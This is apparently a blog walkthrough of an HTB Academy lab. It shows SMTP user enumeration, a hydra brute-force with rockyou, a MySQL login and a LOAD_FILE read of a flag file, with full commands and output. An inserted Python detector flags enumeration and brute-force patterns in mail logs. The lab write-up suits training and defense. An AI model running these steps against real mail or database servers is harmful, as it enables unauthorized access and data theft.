maz4l
HTB Academy: Attacking Common Services Module - Easy Lab

Attacking Common Services - Easy Lab

We were commissioned by Inlanefreight to conduct a penetration test on three different hosts to evaluate their security configurations. Our task was to identify vulnerabilities and locate a flag placed on each server to verify successful access. The flags have the format:

  • HTB{...}

In this post, we will review the security of the first server, which is responsible for managing emails, customer data, and files.

Task

Assess the target server at the domain inlanefreight.htb and obtain the contents of the flag.txt file. Submit the flag as your answer.

Solution Steps:

Update /etc/hosts

Add the target IP and domain to the /etc/hosts file so that the hostname resolves:



   echo "10.129.xxx.xx inlanefreight.htb" | sudo tee -a /etc/hosts



Enumerate the Target

Perform a service scan on the target to identify open ports and services:



   nmap -sV 10.129.xxx.xxx -Pn



Results:



   21/tcp   open  ftp
   25/tcp   open  smtp          hMailServer smtpd
   80/tcp   open  http          Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/7.4.29)
   443/tcp  open  https?
   587/tcp  open  smtp          hMailServer smtpd
   3306/tcp open  mysql         MySQL 5.5.5-10.4.24-MariaDB
   3389/tcp open  ms-wbt-server Microsoft Terminal Services



Find Valid Users

Use smtp-user-enum to identify valid SMTP users:



   smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.xxx.xx



Results:



   Starting smtp-user-enum v1.2 (http://pentestmonkey.net/tools/smtp-user-enum)
   Mode ..................... RCPT
   Worker Processes ......... 5
   Usernames file ........... userlist.txt
   Target count ............. 1
   Username count ........... 79
   Target TCP port .......... 25
   Query timeout ............ 5 secs
   Target domain ............ inlanefreight.htb

   ######## Scan started at Wed Aug 7 06:27:03 2024 #########
   10.129.203.7: f****@inlanefreight.htb exists
   ######## Scan completed at Wed Aug 7 06:27:51 2024 #########
   1 result found: **f****@inlanefreight.htb**



Brute-Force the Password

Use hydra to brute-force the password for the identified user:



   hydra -l f****@inlanefreight.htb -P /usr/share/wordlists/rockyou.txt.gz -t 64 -f 10.129.xxx.xx smtp



Results:



   login: f****@inlanefreight.htb   password: 9********
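
Seen from the mail server's side, the enumeration and password-guessing steps above leave a recognizable pattern: a burst of rejected recipients, then a burst of failed AUTH attempts, from one client. The following is an added example (not part of the original write-up) that flags both over constructed log lines; the log layout, thresholds, addresses and function names are assumptions.

```python
# Added example. Assumed log layout: "<ISO timestamp> <client IP> <verb> <argument> <reply code>".
# Adapt parse_line() to the real log format of your mail server.
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)   # sliding window per client IP
RCPT_REJECTS = 5                 # distinct recipients rejected with 550 in the window
AUTH_FAILS = 5                   # AUTH attempts rejected with 535 in the window

def parse_line(line):
    ts, ip, verb, arg, code = line.split()
    return datetime.fromisoformat(ts), ip, verb, arg, int(code)

def detect(lines):
    """Return a sorted list of (client_ip, finding) tuples."""
    rejects = defaultdict(list)   # ip -> [(ts, recipient)] rejected with 550
    fails = defaultdict(list)     # ip -> [ts] of failed AUTH (535)
    findings = set()
    for ts, ip, verb, arg, code in sorted(map(parse_line, lines)):
        if verb == "RCPT" and code == 550:
            rejects[ip] = [(t, r) for t, r in rejects[ip] if ts - t <= WINDOW] + [(ts, arg.lower())]
            if len({r for _, r in rejects[ip]}) >= RCPT_REJECTS:
                findings.add((ip, "rcpt-enumeration"))
        elif verb == "RCPT" and code == 250 and (ip, "rcpt-enumeration") in findings:
            findings.add((ip, f"valid-mailbox-disclosed:{arg.lower()}"))
        elif verb == "AUTH" and code == 535:
            fails[ip] = [t for t in fails[ip] if ts - t <= WINDOW] + [ts]
            if len(fails[ip]) >= AUTH_FAILS:
                findings.add((ip, "auth-bruteforce"))
        elif verb == "AUTH" and code == 235 and (ip, "auth-bruteforce") in findings:
            findings.add((ip, f"auth-success-after-failures:{arg.lower()}"))
    return sorted(findings)

def sample_log():
    """Constructed log lines, not captured from the lab."""
    t0 = datetime(2024, 1, 1, 12, 0, 0)
    row = lambda s, ip, verb, arg, code: f"{(t0 + timedelta(seconds=s)).isoformat()} {ip} {verb} {arg} {code}"
    log = [row(i, "203.0.113.9", "RCPT", f"user{i}@example.test", 550) for i in range(6)]
    log.append(row(6, "203.0.113.9", "RCPT", "alice@example.test", 250))
    log += [row(10 + i, "203.0.113.9", "AUTH", "alice@example.test", 535) for i in range(7)]
    log.append(row(17, "203.0.113.9", "AUTH", "alice@example.test", 235))
    # An ordinary client: one mistyped recipient and one successful login.
    log += [row(3, "198.51.100.4", "RCPT", "bob@example.test", 550),
            row(4, "198.51.100.4", "AUTH", "carol@example.test", 235)]
    return log

if __name__ == "__main__":
    for ip, finding in detect(sample_log()):
        print(ip, finding)
```

The `auth-success-after-failures` finding is the one to alert on first, since it marks the point where guessing turned into a working credential.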



Connect to MySQL

Log in to the MySQL server using the credentials obtained:



   mysql -u f**** -p9******** -h 10.129.xxx.xx



To read local files through MySQL, we will use the command from the module's Cheat Sheet:



   Welcome to the MariaDB monitor. Commands end with ; or \g.
   Your MariaDB connection id is 11
   Server version: 10.4.24-MariaDB [mariadb.org] binary distribution

   Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

   MariaDB [(none)]> SELECT LOAD_FILE("C:/Users/Administrator/Desktop/flag.txt");
   +------------------------------------------------------+
   | LOAD_FILE("C:/Users/Administrator/Desktop/flag.txt") |
   +------------------------------------------------------+
   | HTB{t*3_4r3_tw0_t0_93t_fl49} |
   +------------------------------------------------------+
   1 row in set (0.070 sec)

Happy Hunting!

By following these steps, we successfully identified a valid SMTP user, brute-forced their password, and accessed the MySQL database to retrieve the flag. This demonstrates a straightforward approach to assessing the security of email and database services.